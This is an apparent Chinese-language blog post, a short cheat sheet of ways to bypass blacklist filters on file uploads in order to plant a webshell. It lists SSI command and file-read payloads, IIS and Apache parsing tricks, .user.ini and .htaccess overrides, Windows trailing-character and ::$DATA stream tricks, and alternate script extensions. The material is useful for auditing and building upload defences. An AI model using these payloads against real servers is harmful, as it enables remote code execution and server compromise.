溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

文件上傳之黑名單驗(yàn)證繞過(guò)

發(fā)布時(shí)間:2020-07-27 15:37:05 來(lái)源:網(wǎng)絡(luò) 閱讀:5028 作者:serverxx0 欄目:安全技術(shù)

當(dāng)做代碼的審計(jì)或者文件搞滲文章上傳的時(shí)候有時(shí)候會(huì)遇到黑名單的驗(yàn)證碼,比如常規(guī)的一些腳本名asp php jsp這種的不允許上傳,下面是我總結(jié)的一些繞過(guò)的方法

Shtml

<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用來(lái)讀文件

<!--#exec cmd="ifconfig"--> //可以用來(lái)執(zhí)行命令

iis解析

sanr.php;.gif

sanr.asp;.jpg

sanr.asp/sanr.jpg

.user.ini

User.ini

auto_prepend_file:指定在每個(gè)PHP頁(yè)面執(zhí)行前所要執(zhí)行的代碼

auto_prepend_file=demo.gif (每個(gè)頁(yè)面都會(huì)加載demo.gif)

.htaccess

AddTypeapplication/x-httpd-php     .jpg

Window特性

  1.   利用空格        demo.php空格 

  2.   小數(shù)點(diǎn)去繞過(guò)      demo.php.

  3.   Ads數(shù)據(jù)流         demo.php::$DATA

  4.   Ads數(shù)據(jù)流(但文件是空)  demo.php:jpg

Window通配符   demo.<<<   兩者相結(jié)合拿到webshell

Tips:直接用3就可以  只不過(guò)延伸下window通配符的方法

      Window通配符可以在包含文件的時(shí)候包含c:window/temp目錄臨時(shí)php文件(文件包含本地測(cè)試成功 但是實(shí)際***很少成功 因?yàn)閟ession文件也是php開頭 如同時(shí)匹配多個(gè)文件以php開頭的這種,會(huì)拿到第一個(gè)php文件,不確保是自己上傳的臨時(shí)文件)

大小寫繞過(guò)

aSp  pHp  JsP

擴(kuò)展名繞過(guò)

Aspasa  cer  cdx 

Aspx: ashx  asmx ascx

Php:  php3 phtml

Jsp:   jspx  jspf

Apache的解析

         sanr.php.xxxxxx


附件:http://down.51cto.com/data/2366130
向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI